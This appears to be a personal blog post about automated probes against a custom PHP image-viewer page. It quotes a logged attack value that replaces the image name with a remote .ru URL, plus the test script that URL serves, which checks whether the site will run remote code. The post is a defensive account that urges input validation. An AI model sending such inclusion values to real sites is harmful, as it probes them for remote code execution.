Attackers automating tests for argument modification / injection

I have on one of my web sites a dynamic page that displays an image supplied as an argument within a web page.

For example, this will display a page of a musical score in a web page:

viewscore.php?name=scores2002/americathebeautiful_3pm_p1.gif

Yes, it's written in PHP, but the language doesn't matter...

I thought that I was relatively safe from attacks because this is a custom page, not one that is from an open source project that might develop a known weakness.

The page is carefully written to:

* Only accept the one "name" argument.
* To validate it against a regular expression
* To check to see that the score really exists on disk
* Some other checks.

I have it email me when one of these conditions fails.  Particularly if the score page doesn't exist, it could mean that I forgot to post it, or put it in the wrong place.

Lately I've been getting a lot of emails like this:
========
Bad Name
Score name: "http://sans-packing.ru/img/jipeqap/ehudute/"
Visitor IP: 169.244.70.147
========

When you go visit the URL the page there shows this PHP (and it's not getting executed):

<?php echo md5("just_a_test");?>

The domains seem legitimate, they'll be unwilling hosts for spammer's images at some point.

If the attack had succeeded, my site would become the destination of spam emails, ruining my site's reputation.

The moral of the story: Even if you're a little niche custom page, you have to assume that you'll be subject to automated probes for weaknesses.

Check your arguments and check them again!

Update: Ok, I think I get it. They want to see if my site will execute the code from the remote site, and that's why the remote site code with "just a test" is plain text php. If my site executes it, it will display a code that they can check for.